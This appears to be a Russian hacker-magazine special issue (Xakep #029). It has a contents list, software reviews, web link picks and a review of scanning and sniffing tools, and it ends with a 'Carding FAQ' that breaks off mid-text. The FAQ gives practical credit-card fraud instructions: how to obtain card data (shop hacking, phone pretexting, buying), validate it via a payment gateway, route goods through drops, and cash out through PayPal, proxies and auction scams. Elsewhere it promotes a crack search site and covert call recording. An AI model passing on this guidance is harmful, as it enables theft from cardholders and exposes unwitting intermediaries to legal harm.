Спецвыпуск Xakep, Содержание номера # 029

Cover 029 |
Статья | Стр.
SPEZial delivery |
Soft | 006
Hard | 008
Web | 010
Hack Tools | 012
FAQ |
Кординг | 014
Cover Story |
Военный НТТР'ОВЫЙ DNS | 020
Другая сторона FLASH | 026
Натуральное хозяйство | 030
ВЕБ-шпионство | 034
Скажи нет плагиату | 038
10 грязных методов | 042
Умный СПАМ | 044
Правовой ликбез | 046
По ту сторону маски | 048
Сетевые дети лейтенанта Шмидта | 052
Преступление и наказание | 058
Чернокнижное туннелирование | 062
PHPCount | 064
Маскировка в сети | 066
Организованное кидалово | 070
Левая дизинг-контора | 072
Мультики под замком | 074
Насадка на ОНЛАЙН-МАГАЗИН | 076
Сало в шоколаде | 080
haXOrz4haXOrz |
haXOrz4haXOrz - инфа для пагокодера в сети | 082
PAYALNIK Доктора Добрянского |
Твой первый секстант! | 086
Паяльник на службе WEB-мошенников | 088
Перегонный аппарат | 090
WINformation |
Домашний госплан | 092
Miranda ICQ | 094
][-DESKTOP | 096
Разрывая плоть | 098
Ось не для всех | 100
UPDATE | 102
КРЕАТИВ |
Вся наша жизнь хентай | 104
Дайте открывалку! | 108
Введи всех в транс! | 109
TIPS OF FLASH: | 112
TIPS OF WEB: | 114
STORY |
Уровень агрессии | 116
КНИЖКИ |
Буки для начинающего WEB-мошенника | 124
E-MAIL | 126
KOMIKZ | 128


Спецвыпуск Xakep, номер #029, стр. 029-006-1, SOFT

SOFT

Kirion (kkr@mailru.com)

Спецвыпуск Xakep, номер #029, стр. 029-006-1

Ну вот, за окошком уже вовсю тает снег, настроения идти в институт нет никакого, а я в первый раз за последние две недели дополз до компьютера с желанием поработать (которое появилось только после угрозы оставить меня без зарплаты :)). Страшная это вещь - праздник по-русски :). Особенно день рождения. Особенно свой :). Особенно, если посчитать количество принятых расширителей сознания различного характера и заподлянскую традицию записывать все это на камеру (кстати, никому не нужна эксклюзивная запись невменяемого Ильича, недорого :)). Ладненько, я пока пойду попью кефирчик, а ты почитай про софт начала марта :).

Opera 7.02 (www.opera.com), 3.2 mb without java, 12.6 mb with java

Пока все пели дифирамбы новой версии шустрого браузера, некоторые темные личности искали в нем баги. И преуспели в своем занятии. Что они нашли? Ну, во-первых: Opera позволяет читать твои хистори, предыдущий линк в очереди и следующий. Ну, это не так страшно, скажешь ты. Но есть еще и во-вторых: Opera некорректно обрабатывает некоторые адреса, позволяя читать любой локальный файл. И в-третьих: Opera неправильно обрабатывает вызовы функций, что приводит опять-таки к возможности чтения локальных файлов. Если хочешь знать больше - топай на greymagic.com/adv/ и на www.secunia.com/advisories/8155/. Защититься от этих багов можно, выключив Javascript или скачав свежую версию. Кстати, что-то мне подсказывает, что обновлений в скором времени будет много. Ибо движок все же сыроват: я нашел сайты, которые нормально отображались 6.05, а в 7.02 - нет. Уже вышла неофициальная версия 7.02, так называемый Bork edition. Если кто не в курсе: у Opera software небольшая война с Microsoft. Началось все с того, что обнаружился нелицеприятный факт: сайты MSN при обнаружении в качестве user-agent Opera посылали заведомо кривой CSS, и страницы отображались неправильно. В ответ был выпущен Bork edition, в котором сайты MSN уродуются уже самой оперой :). Ну и, вдобавок, было объявлено, что мобильная версия Opera не будет выходить на платформе Windows CE. Несмотря на мое глубокое уважение к разработчикам, последний шаг я все же считаю ошибкой, но им, наверное, виднее... Зато теперь быстрее выйдет Opera 7 под линух :).

Light Alloy 2.0 (la.video-soft.com), 1.69 mb

Иногда меня раздражает BSPlayer. Это из-за некоторых глюков, повторяющихся от версии к версии, общая нестабильность и кое-какие нарекания к интерфейсу. Теперь я нашел видеоплеер, которые будет заменять BSPlayer в периоды такого настроения :). Light Alloy прост, однако достаточно симпатичен (хотя я сразу включил скин в стиле QuickTime) и весьма удобен. Он умеет корректно проигрывать фильмы с несколькими звуковыми дорожками, весьма удобно сделана полоса прокрутки. Но больше всего меня порадовало управления мышью. Просто и удобно: нажал среднюю кнопку - перешли на полный экран; нажал на правую кнопку - появились элементы управления; нажал левую - пауза. Настройки несложные, тем более что интерфейс - русский. Еще пара версий, и с BSPlayer будет покончено... (протестую! он криво работает с некоторыми кодеками, которые BS принимает как родные - прим. Дронича).


Спецвыпуск Xakep, номер #029, стр. 029-006-2, SOFT

SOFT

Kirion (kkr@mailru.com)

Спецвыпуск Xakep, номер #029, стр. 029-006-2

Quintessential player 3.4 (quinnware.com) 2.5 mb

Продолжим с плеерами. Может быть я немного консервативный человек, но дома я до сих пор пользуюсь Winamp 2.81 с несколькими любимыми плагинами. Ничего не изменил и выход третьей версии, которую я считаю большой недоделкой и неудачей. Но иногда же хочется новых ощущений... Вот прочитал заметку про Quintessential Player и решил скачать. Слегка необычно им пользоваться после Winamp, однако настройки похожи. Подходили бы еще плагины, было бы просто супер. Впрочем, они достаточно активно выходят, равно как и скины. Кстати, о скинах: по-моему, QP - самый красивый плеер из всех существующих. Особенно меня порадовали маленькое окошко визуализации и выезжающий эквалайзер. Кстати, программу можно свернуть в небольшое окошко или вовсе в полоску, чтобы не мешалась на экране. Плохо вот только, что за красоту приходится платить памятью: QP отжирает почти в два раза больше, чем Winamp. Ну зато это не Apollo, выглядящий намного хуже, а памяти кушающий почти столько же :).

IrfanView 3.8 (www.irfanview.com), 0.8 mb

Несмотря на несознательные поползновения некоторых членов нашей редакции в сторону XnView (www.xnview.com), IrfanView пока что остается моей любимой смотрелкой. Где те времена, когда ACDsee был таким же легким, быстрым и фриварным :). IrfanView поддерживает кучу форматов (а если скачать один файлик с плагинами - станет поддерживать еще больше). Фактически он понимает все известные и не очень форматы изображения, аудио и видео форматы. Жалко только, нет в составе некого подобия проводника. Есть возможность применить некоторые фильтры к изображению, конвертировать в другой формат, изменить палитру. Поддерживаются работа в командной строке и пакетное преобразование файлов. В новой версии добавлена возможность читать еще десяток форматов, а также записывать на болванки слайдшоу при помощи Nero. Ну и подчищены некоторые баги, разумеется.

jv16 Power tools 1.3 (www.jv16.org), 2.13 mb

Обновился мой любимый чистильщик системы. Напомню, что Power tools - это логическое продолжение серии Regcleaner, лучшего чистильщика реестра. На сайте автора не без гордости написано, что Power tools обладают лучшим механизмом очистки реестра на сегодняшний день. Кроме очистки реестра от вредных примесей прога позволяет редактировать контекстные меню, список программ в "установка\удаление...", ассоциации с типами и автозагрузку. По сравнению с предыдущими версиями улучшился механизм поиска, а также стабильность программы. Кстати, теперь средствами проги можно шифровать файлы, причем в качестве ключа могут выступать не просто пароли, а такие вещи, как: изображения, диски и файлы. В остальном все осталось по-прежнему: и навороченная и никому не нужная консоль, и средства работы с несколькими пользователями. Лучше бы очистку временных файлов улучшили...

А в целом - богатый на софт месяц получился. Программисты после зимы не расслабляются и радуют нас новыми и интересными продуктами. Жаль, что в рамках нашей рубрики нельзя рассмотреть все их творения, нашедшие приют в недрах моего винта. Постараюсь писать о самых интересных продуктах, а если что пропущу - не серчай, отпишись на мыло. Глядишь, в следующем номере и упомяну :).


Спецвыпуск Xakep, номер #029, стр. 029-006-3, SOFT

SOFT

Kirion (kkr@mailru.com)

Спецвыпуск Xakep, номер #029, стр. 029-006-3

Пока все пели дифирамбы новой версии шустрого браузера, некоторые темные личности искали в нем баги. И преуспели в своем занятии.

Где те времена, когда ACDsee был таким же легким, быстрым и фриварным :).


Спецвыпуск Xakep, номер #029, стр. 029-010-1, SPEZial Delivery - WEB

SPEZial Delivery - WEB

Krava (krava@nnm.ru)

Спецвыпуск Xakep, номер #029, стр. 029-010-1

Web-привет всем!

Начинаем наши игры - буду сеять новыми и хорошо забытыми старыми линками...

http://filez.nastart.ru/i.shtml

Сбылась мечта любителя софта - в Интернете открылся новый сервис - файлообменник. Старый добрый filesearch.ru (поисковик файлов) нервно курит в уголке. Продуманность сервиса просто поражает! Сущность работы его такова - юзер регистрируется на сайте, получает доступ к глобальной базе файлов и может заливать на сервер свои файлы. Вся база файлов хорошо структурирована - в отдельные разделы вынесены утилиты, игры, патчи, драйвера, скринсейверы, обои и текстовые файлы. Все остальное сбрасывается в "Разное".

Для каждого файла создается отдельная запись, в которой есть название файла, краткий комментарий автора, ник автора, объем и количество закачек файла. Каждый пользователь после закачки файла может оставить к нему комментарий на сайте.

На сайте можно просмотреть, какие файлы залил юзер в виде ленты записей и ленты "друзей" юзера.

База файлов постоянно пополняется, только за последнюю неделю на сайт залито больше 150 мегабайт, и на момент написания статьи на сайте "937,71 Мбайт радости"! ;-).

Регистрируйся, качай, все только начинается!

http://www.fgames.com.ru

Технология flash дала нам не только удобство и юзабельность для наших сайтов, flash дал возможность создавать отличные, зрелищные игры, умещаемые в считанные мегабайты (а то и сотни килобайт). Эта ниша компьютерных игр развивается очень быстро и постоянно наводняется новыми продуктами. Авторы сайта решили объединить как можно больше игр, и, должен сказать, это им удалось!

Игры на сайте удобно разбиты по жанрам - аркады, азартные игры, драки, ролевые игры, квесты, классические, логические, приколы, симуляторы, спортивные, шутеры (стрелялки) и эротические.

На сайте есть свой Top10 наиболее популярных игр с рейтингом популярности.

Конечно, вполне логично, что 6 из 10 в Top10 - игры эротические... ;-).

Кстати, здесь есть и игра, сделанная по очень известному flash-мульту XiaoXiao о драках рисованных человечков. Очччень увлекательно... провалял дурака полчаса ;-).

Очень полезная фича - посетитель может добавить свою любимую игру на сайт, если таковая там отсутствует.

http://www.longhorn.winall.ru

Что, ребятушки, WinXP вышла и расслабились? На носу новое изделие от дядюшки Билли - Windows Longhorn! Вот уж точно родители пошутили... Лонгхорн... покруче, чем ХаэР.

Новый продукт господа мелкософтовцы обещают в конце 2003-го - начале 2004 года, но наши ребята не дремлют!

Уже несколько месяцев существует сайт, на котором собрана вся доступная информация о новой ОС. Уже существует и доступна к скачиванию альфа-версия Microsoft Longhorn (сколько ж там багов, наверное... ;)), для посетителей - три больших обзора новой ОС, программы для установки на WinXP нового стиля и иконок Longhorn, прога-эмулятор работы с новой ОС и многое другое. Все больше идет интеграция с Интернет, что и понятно... Здесь же, на сайте, можно посмотреть скриншоты, обсудить вопросы в форуме и гостевой.

Как правильно сказал один мой знакомый - "не использую новую винду до выхода второго сервиспака под нее".


Спецвыпуск Xakep, номер #029, стр. 029-010-2, SPEZial Delivery - WEB

SPEZial Delivery - WEB

Krava (krava@nnm.ru)

Спецвыпуск Xakep, номер #029, стр. 029-010-2

http://cpu-museum.de

Ну вот, дожили... в Интернете есть музей процессоров. Сам по себе сайтик старый, но постоянно пополняется. У тебя ностальжи, как и у меня, по старым временам? Какой комп был у тебя первый? Pentium100? AMD К5? 80486SX-25? Или как у меня - 8088? Если для тебя этот набор букв что-нибудь да значит - на сайт зайти стоит. Да если ты и новичок, зайди, увидь - на каких процессорах работали предки... ;-).

На сайте собраны процессоры от 27 фирм! Здесь как процессоры для ПК (от Intel, от AMD, от Cyrix), так и для других устройств. Если честно, о трети фирм я и не слышал...

Сайт расположен, как понятно из линка, на немецком сервере, но сам он англоязычный, разберешься!

Если ты - обладатель процессора, которого нет на сайте (а такое должно быть редкостью, их там очень много), - можно прислать его фотку для коллекции.

На сайте также гостевая, полезные линки по теме и голосования в стиле "Какой был твой первый комп?".

http://www.filosof.tk

Философ.тык - очень неоднозначный сайт, его трудно описывать. Легче, конечно, зайти и посмотреть... труднее - зайти и понять идею автора. Почему он так называется? На первый взгляд, в нем нет ничего философского, хотя... философия для каждого своя.

Ну а если кратко объяснить - здесь все обо всем; есть очень хорошо, с юморком написанные обзоры вышедших фильмов. Есть тут описания новых фильмов, которые только должны выйти со ссылками на ролики из них (Terminator3, Matrix2). Небольшая библиотека текстов, но достойных прочтения. Хорошие статьи о 3d, совсем немного мелких утилит, но протестированные и качественные. Естественно, все это на русском.

Ну а вообще - ребята толковые и не сидят на месте, время от времени у них появляются новые подпроектики, и один краше другого.

http://ufo.kulichki.com

"Все, что вы хотели знать об НЛО и Аномальных Явлениях природы, но не решались никого спросить". На этом официальном названии сайта можно было бы закончить и перейти к следующему сайту ;-).

Но, вкратце, пройдемся по разделам. Собственно статьи с иллюстрациями о НЛО и внеземном интеллекте, интересно об аномальных явлениях природы, связи теорий с медициной, астрономией, космонавтикой и др.

Сайт часто обновляется, за последний месяц на нем 5 новых статей! Отдельно хочется отметить интересные материалы о телепатии.

http://crk.codenet.ru

Единственный сайт без скриншота. В скриншоте нет необходимости, единственное присутствующее на главной странице - поисковая строка и кнопка Search.

Что же это за сайт? Ну вот представь себе... у тебя есть shareware-прога, у которой заканчивается срок работы... Кому знакомо? Понимаю, всем ;-).

Поисковик кряков! Очень удобный сайт, русскоязычный аналог Асталависты, НО: без всплывающих порнушных окон, с одним единственным баннером!

Это именно то, о чем так долго говорили большевики ;-). База сайтов, на которых производится поиск, наверное, слабее, чем на буржуинском аналоге, но ненамного.

Проект только начал развиваться, но популярность его растет большими темпами.


Спецвыпуск Xakep, номер #029, стр. 029-010-3, SPEZial Delivery - WEB

SPEZial Delivery - WEB

Krava (krava@nnm.ru)

Спецвыпуск Xakep, номер #029, стр. 029-010-3

Информация должна быть свободной! Ищите... и найдете.

http://www.copperfield.ru

"Однажды Дэвид Копперфилд накрыл статую Свободы покрывалом, и она исчезла.

"Чудо!" - подумали люди.

"Ни фига себе..." - подумал Копперфилд." (с) из КВН.

Всем, кто свято верит в "чудеса" "мага и волшебника всех времен и народов" - перелистнуть страничку :-).

Копперфилд.ру - русскоязычный сайт, полностью посвященный разоблачению секретов Дэвида Копперфилда.

Авторы сайта ни к одному из материалов не отнеслись голословно, все подтверждают видео- и фотофрагментами, которые можно скачать здесь же на сайте.

Знаменитый "полет" Дэвида не только разгадан, но и повторен командой, разрабатывающей сайт. Большинство трюков, таких как "пила смерти", протыкание карандашом купюры и другие, - тут описаны подробно и с иллюстрациями, показывающими "ловкость рук".

Немножко, конечно, авторы перестарались... мы и сами понимаем, что тут никаких сверхъестественных вещей не происходит, и большинство смотрит его шоу, чтобы посмотреть, как он удачно разводит народ ;-).

Мало того, ребята даже связались с Дэвидом по телефону и выложили фрагмент разговора в mp3 на сайте, где он, естественно, четко объяснил, куда им нужно пойти вместе со своим сайтом ;-).

Девиз сайта - "просто открой глаза", из чего все понятно. Навигация по сайту удобная и вообще сделан он стильно; единственное, что раздражает - звуковые эффекты при передвижении курсора по кнопкам.


Спецвыпуск Xakep, номер #029, стр. 029-012-1, Обзор хакерских тулз

Обзор хакерских тулз

ХрымZ (hrimz@xyligan.ru)

Спецвыпуск Xakep, номер #029, стр. 029-012-1

Привет! Первый обзор, если ты помнишь, был сильно никсанутый, ну мне начальство и сказало, что надо бы разбавить этот океан линукса виндовыми творениями. Есть, выполняю. Согласись, что пока винда по количеству юзеров рулит, да и достойного боевого софта под нее тоже много, так что готовь качалку, будем обзорить :)!

Имя: Xspider 6.5.0.12

Платформа: win (все)

Политика: Freeware

Весит: 1320Кб

Веб: http://www.ptsecurity.ru/download.asp

Много раз говорили в Спеце об этой проге и по большой части только хорошее.

XSpider часто меняет версии, но в последних релизах изменения уже не столь существенные, как раньше. В основном меняется только размер базы данных уязвимостей и другой апдейтный стафф. В этот раз девелоперы предоставили новогодний релиз 6.50.

XSpider может практически все, то есть после окончания изучения удаленного узла (предварительно включи все опции на сканирование) ты будешь знать о системе столько, что только последний лох не сможет ничего деструктивного сделать с полученной инфой :). Но за качество придется платить скоростью работы, и платить дорого. Где-то полчаса Сетевой паук будет тыкаться своими щупальцами в чужие дыры на oldschool dialup`е ;). Но ведь не обязательно врубать все возможности софтины, можно юзать только то, что нужно для конкретного случая, благо интерфейс проги очень рульный и разобраться можно за 2 минуты.

З.Ы. Перец, из чистого любопытства сходи на главную пагу (www.ptsecurity.ru) и посмотри, чем ребята из андеграунда занимаются теперь. Молодцы люди - деньги легально делают!

Имя: Xsharez 2.0.3.2

Платформа: win (все)

Политика: Trial

Весит: 400Кб

Веб: http://www.tools-for.net http://www.irctoolz.com

Имхо, лучший сканер NetBios ресурсов. В триальной версии ограничено количество хостов для сканирования (1..255). Скорость работы просто поражает, и достойные конкуренты вряд ли найдутся, разве что Legion. Расстраивает шароварность проги, но это уже давно лечится, так что я не понимаю, зачем вообще авторы перевели ее в разряд shareware - кто будет покупать хакерский софт :)? Приставка X в начале названия говорит о том, что журнал "Хакер" и здесь успел приложить свои грязные лапы :). Да, примерно два года назад был такой выпуск, где негласной темой номера стояли расшаренные ресурсы, в том же номере была статья одного из авторов Xsharez, в общем корнями софтина уходит в ][. Тогда же был выпущен Xsharez Xakep Magazine release. Да что говорить, хорошие времена были, так что для приятных воспоминаний и быстрого скана качать всем незамедлительно!

Имя: GFI LANguard Network Security Scanner 3.1

Платформа: win (все)

Политика: Shareware

Весит: 4.5Мб

Веб: http://www.gfisofware.com

Очередная версия хорошей программы. LANguard Scanner выдает кучу полезной инфы об удаленном хосте. Скорость работы на диалапе - приемлемая, то есть менее 5 минут, а в локалке - так вообще песня :). Оно и понятно, так как изначально прога предназначалась для мониторинга и изучения машин в локальной сети. Очень советую поставить всем обладателям LAN, так как полезностей много не только для взлома, но и для нормальной настройки сети и исправления багов. Все же есть один небольшой недочет - прога в основном ориентирована на windows-системы, хотя при виде unix`а на удаленной тачке прога не вылетает :). Но счастливым обладателям пиратской WinXP, например, сообщит обо всех не поставленных патчах, известных ошибках, напомнит, что продвинутый народ уже навешал на себя СервисПуки и т.д. Линуксоидам же придется довольствоваться просто указанием версии системы и другой общей инфой...


Спецвыпуск Xakep, номер #029, стр. 029-012-2, Обзор хакерских тулз

Обзор хакерских тулз

ХрымZ (hrimz@xyligan.ru)

Спецвыпуск Xakep, номер #029, стр. 029-012-2

Имя: LanSpector 1.04

Платформа: win (все)

Политика: Technology preview

Весит: 916Кб

Веб: http://tmeter.ru/lanspector

Творение русского программера, LanSpector представляет собой типичную софтину а-ля все в одном флаконе для изучения ресурса (см. скриншот). Ничем особенно сильно не выделяется среди моря конкурентов, хотя по скорости работы сильно обгоняет ip-tools. Еще в плюсы можно записать наличие сниффера, но работать он будет только после установки специальной библиотеки WinPcap версии 2.3 или выше, которую можно безвозмездно слить http://winpcap.polito.it. После этого можно наслаждаться содержимом бегающих в твой (или чужой :) Lan сетевых пакетов. Еще раздражает англоязычность проги. Не волнуйся, я не русофоб, просто подобных софтин на забугорном завались, а на русском единицы, так почему бы не порадовать нас русской версией или русификатором? Ладно-ладно, больше не наезжаю, все равно утилита смело может присутствовать на твоем винте.

Имя: CRT 4.02

Платформа: win (все)

Политика: Trial

Весит: 400Кб

Веб: http://

Каждому реальному киберпиплу по реальной терминалке! Наверняка уже задолбал стандартный HyperTerminal, telnet, ftp etc... В общем, вот она - самая рульная из рульных терминалов - CRT. Поддерживает кучу режимов, удобный интерфейс, в общем плохо только то, что денежку за нее просят. В тысячный раз повторяемся, что без astalavist`ы мы бы уже давно загнулись от разорения :). Но за такое не грех и заплатить, так как прога удовлетворит извращенные желание любых хакеров-терминальщиков :). Хочешь позвонить на BBS`ку (не забывай, они еще есть и в Москве, и Питере и даже не собираются загибаться под натиском internet, главное - уметь искать) или у тебя есть список телефонов с модемными пулами, где ты не прочь пошалить? В общем, для всех этих радостей - CRT всегда пожалуйста! Есть даже поддержка VBScript, в общем - найдется где развернуться script-кодеру. Жаль, перла в ней только нет :).

Имя: Call Corder 3

Платформа: win (все)

Политика: Shareware

Весит: 400Кб

Веб: http://www.voicecallcentral.com/rus

Не совсем подходящая под этот обзор софтина, но в то же время совершенно незаменима для компьютерного гуру и автоматически входит в "состав" хакерских тулз. Call Corder - это программа для записи и прослушивания телефонных разговоров при помощи голосовых функций модема. Так что если твой мопед этим счастьем не обладает - бегом за обновой, а старый загони барыгам на рынке :). Дело твое, но я уже во всю почувствовал весь кайф этой проги. Можно слушать и писать как параллельные разговоры на линии, так и те, что ведутся через микрофон и уши, подключенные к модему. Кроме шпионско-хакерского применения, Call Corder юзается для телефонного пранка. То есть все свои похабные приставания к бабушке по телефону можно и нужно перегнать в mp3 и выложить в сеть. Так что к бою!


Спецвыпуск Xakep, номер #029, стр. 029-014-1, Carding FAQ

Carding FAQ

GL4Zъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-014-1

Внимание! Только для ознакомления и для того, чтобы защитить себя и свои деньги в Интернете!

Что такое "кардинг"?

Кардинг - это способ мошенничества, при котором используются кредитные карты. Из слова "мошенничество" вытекают соответствующие последствия (последствия из занимательной книжки "УК РФ" ;)). Кардинг используется для получения денег. Иначе не так много народу бы им занималось.

Что такое фрауд?

Это незаконная операция. То есть ты спер креду и вбил ее куда-то без разрешения ее владельца.

Что такое карты (креды, картон, картофель, СС, мухи, слоны и т.д.)?

Собственно, это и есть камень преткновения всего кардинга. Ну, я думаю, ты видел настоящие пластиковые карты в реале. Они позволяют тебе не носить с собой увесистую пачку долларов, а хранить их в банке и в удобное для тебя время снять деньгу, когда тебе потребуется. Но раз деньги хранятся в банке, то ты не только можешь снять наличку или заплатить в магазине, расписавшись на чеке лично, но и совершить покупку в онлайн (ака Интернет) магазине.

Почему большинство кардеров так любят онлайн-магазины?

Дело все в том, что, когда ты покупаешь товар в онлайн-магазине, тебя никто не видит, не требует от тебя подписи. Тогда что мешает тебе заказать товар себе по чужой карте? Это, естественно, относится не только к е-магазу, а например, к хостингу или к порнику... Для заказа в основном требуются следующие вещи:

1. Номер кредитки

2. Срок годности (Exp. Date)

3. Имя кардхолдера (владельца карты)

4. Адрес его проживания (биллинг адрес), телефон

5. Спец код (CVV/CVV2)

Обо всех этих вещах читай ниже.

Где мне достать креду?

Ну, тут есть различные способы:

- Взломать е-маг. Только теперь банки не разрешают хранить СВВ код у себя на сервере, так что либо ломай банк, либо подсасывайся к форме ввода данных.

- Протрахать кому-нибудь мозги (НЛП). То есть, например, звонишь какому-нибудь челу, говоришь, что из банка, трали-вали, дай номер креды... Некоторые ведутся... =).

- Можно самому создать какой-нибудь магазин или порник. Или сделать насадку на существующий.

- Купить. На данный момент самый оптимальный вариант для тебя. Да и если ты собираешься заняться кардингом, то ты вряд ли будешь доставать креды сам. Их легче купить и использовать для своих нужд, хотя иметь свой сервачок для сшибания кред довольно неплохо :).

А креды вообще как-нибудь различаются?

Естественно! Для вбива кред (применение их по назначению кардера :)) не подойдет бабушкина сбербанковская кредитка, на которой лежит ее пенсия.

СС бывают 3-х основных видов:

- Visa (сокр. VI) (для кардинга VI Electron не подходит);

- MasterCard (MC);

- American Express (AMEX);

Есть еще другие, но их редко где принимают.

У каждой карты есть 16-значный номер. Первая цифра указывает на тип карты: 4 - это VI, 5 - MC, 3 - AMEX.

Я слышал такое слово "эмитент". Что за зверь?

Это банк, который выпустил (выдал клиенту) карту. По-англицки - Issuer. Первые 4-6 цифр указывают на банк-эмитент. На фига это бывает надо? Потому что некоторые банки работают лучше, другие хуже, то есть от этого зависит, пройдет твоя креда или нет. Вот так.


Спецвыпуск Xakep, номер #029, стр. 029-014-2, Carding FAQ

Carding FAQ

GL4Zъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-014-2

Кто такой БИН (BIN)?

Нет, это не Мистер Бин, о котором ты подумал. Это БИН (BIN - Bank Identification Number) - грубо говоря, это и есть те 4-6 цифр номера карты. То есть это уникальный номер банка, который выпустил карту.

Что за CVV/CVV2/CVN код?

Это такие 3-4 цифры, которые позволяют "улучшить" защиту карты ;). Теперь редко встречаются места, где не используется СВВ код. Это значит, что скоро обычные карты (без кода) использоваться нигде не будут.

А что еще за биллинг-адрес и телефон в информации о карте?

Это адрес владельца карты. Туда может поступить счет за купленный товар. Это тоже в целях безопасности.

Телефон иногда используют для подтверждения заказа. Некоторые шустрые магазины проверяют так называемый Area Code с биллинг-адресом. Area Code - это что-то типа кода города у нас в телефоне. Поэтому, если укажешь рандомный набор цифр, могут возникнуть подозрения. Вообще, для серьезных дел народ использует специальных людей-подтверждальщиков из той страны, откуда креда. Естественно, не за бесплатно.

Ну ладно, карту я достал. Что теперь?

Теперь тебе надо проверить, рабочая она или нет. Называется проверкой карт, чеканьем, верифаингом и т.д. Делается путем снятия с карты некоторой суммы денег, желательно минимально возможной. Некоторые "грамотные люди" могут сказать, что карты можно проверить на порнике. Этого я тебе делать не советую. Только так карты и убиваются. Делать это можно, и даже нужно, через authorize.net. Для этого тебе нужен x_login. Его можно купить, одолжить, подобрать. Если фантазия богатая, можно подобрать. Логин есть. Теперь попробуй втыкнуть прогу ePlus. Она проверяет карты через Authorize.net, снимая с них определенную сумму. Качать и читать по ней доку тут - http://eplus.hypermarket.net.

Ну, теперь у меня карты чеканные! Куда их совать?

Ну, совать их никуда не надо. Теперь, собственно, начинаем кардить. Только надо определиться, что конкретно ты хочешь от кардинга.

Ну, я шмоток хочу себе купить! Это как у вас называется?

Вещевой кардинг. Ты берешь креду, садишься на проксю, идешь в лабаз и пытаешься что-то там купить. Это один из самых опасных видов кардинга. Так как в любом случае ты выходишь из тени.

Не беги покупать компьютер, автомобиль, Боинг и т.д. Во-первых, не вышлют, во-вторых, могут зажопить. Лучше начинать с малого.

Кто такой дроп?

Так как магазины не любят высылать товары в Россию (не знаешь, почему? ;)), тебе понадобится человек, который будет принимать заказанные тобой товары. Он может быть где угодно, но удобно, если в Америке. Им больше доверяют. Хотя если шоп, допустим, немецкий, то и дроп может быть немцем. Дропом может быть твой друг, живущий за бугром, или просто американец, которого ты методом социальной инженерии попросил переслать то, что придет ему скоро. Дроп может быть профессионалом, а может просто мимо проходящим челом, который не знает, что товар карденный. Он может продать товар и переслать тебе деньги (при этом отсчитав комиссию), может просто выслать тебе товар, а ты ему переведешь деньги. Это как тебе нравится.


Спецвыпуск Xakep, номер #029, стр. 029-014-3, Carding FAQ

Carding FAQ

GL4Zъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-014-3

А кто такой вбивальщик?

Это человек, который идет и вбивает карту (совершает покупку) в нужный сервис. Например, заказывает на адрес дропа товар, покупает хостинг или еще что. Ну, думаю, понятно. Только если ты думаешь, что это так просто и любой дебил с кредой наперевес может стать вбивальщиком, то это ты зря. Нужно все провернуть так, чтобы ты выглядел полнейшим американцем (или кому ты там заказываешь). То есть у тебя все должно быть, как у ламерикоса: ось, ip(прокся), осел - в общем, все! И еще много нюансов.

Что такое merchant account?

Это такой транзитный счет в банке, который открывается продавцом, чтобы снимать деньги с карт. Открывая такой счет, банк соглашается платить продавцу за снятие денег со счетов покупателей в банках-эмитентах. Я вижу, как загорелись твои глаза, так что достаю огнетушитель и тушу. Фиг ты откроешь такой счет. Для этого ты должен быть жителем ламерикосии, потом ты должен иметь профессионально оформленный сайт и ты должен будешь всем своим видом показать, что именно твой магазин (или порник) сможет окупить себя. Так что открытие аккаунтов дело очень сложное, и на первых порах тебе придется об этом забыть.

Что такое PayPal (Палка)?

Это такая система, типа наших WM. Но она позволяет кидать лаве на аккаунт с креды, а потом переводить их на банковский счет или как-нибудь по-другому выводить их.

Как мне работать с Палкой?

Ты заходишь на сайт, жмешь sign up и вводишь инфу с карты. Далее указываешь созданный тобой e-mail и ждешь на него письма для подтверждения, что счет открыл именно ты. Потом заходишь на свой счет и жмешь "add credit card". Если увидишь, что карта добавлена, то это значит, что ты можешь с нее платить. Вперед, но помни, что сидеть ты должен на прокси (ессесно, анонимном), причем именно той страны, из которой кардхолдер. И еще одно. Если с этой прокси уже кто-то вбивал креды и пришел charge back (то есть владелец просек фишку), то аккаунт заблокируют. Так что юзать надо не прокси со спайлога, а какие-нибудь редкие. Тебе повезет, если она будет вообще не юзанная. Потом переводишь деньгу на счет в каком-нибудь американском банке, открытом, естественно, каким-нибудь лохом-американцем. А америкос, в свою очередь, шлет тебе деньгу, отсчитывая себе процент.

Но все не так розово, как кажется. Все больше проксей садится в черные списки Палки, все меньшие суммы можно переводить через Палку, также трудно найти счет в банке. В общем, работать с Палкой становится все труднее и труднее. Советы: переводить меньше 500 долларов, покупать новые прокси и не жалеть на них денег, менять чаще браузер и чистить куки.

Ну, а еще какие есть способы обнала, кроме Палки?

Еще есть аукционы. Это когда ты выставляешь товар туда, потом какой-нибудь америкос покупает его, высылая тебе деньги, а ты ему ничего... Короче, кидалово. Но, когда ты вписываешь там, что деньги переводите на Русь, какой могучей она бы ни была, америкос ничего не вышлет. Ну не нравимся мы им :). Вот поэтому выход - дроп. Или escrow-сервисы. О них ниже. Вообще, для того чтобы работать на аукционах, нужно хорошее знание английского.


Спецвыпуск Xakep, номер #029, стр. 029-014-4, Carding FAQ

Carding FAQ

GL4Zъ (glazy@mail.ru)

Спецвыпуск Xakep, номер #029, стр. 029-014-4

Еще есть казино. Тут просто сидишь и играешь. Только не всякие казино поддерживают все бины кред.

А дропу ведь влететь может...

Может! Причем очень конкретно. Если дроп - профессионал, то он отмажется, это его хлеб. Но вот если простой, честный амер, который знать не знает, что он делает, то ему будет очень плохо. Иногда такие письма приходят, что хочется лечь на амбразуру и рассказать, что это ты... Главное - относиться к этому всему параллельно. И мыло открывать одноразовое. Кстати, в основном лучше использовать либо платные мыла (то есть регить сервак и делать редирект) или бесплатные, но очень редкие. Потому что, во-первых, некоторые аукционы или еще кто не разрешают использовать бесплатные мыла, а во-вторых, их легче забыть. И лучше не использовать мыла типа vasylek@mail.ru и т.п., так как, я уже говорил, - с русскими почему-то дело иметь не хотят ;).

Так что ты говорил про escrow-сервисы (ЭС)?

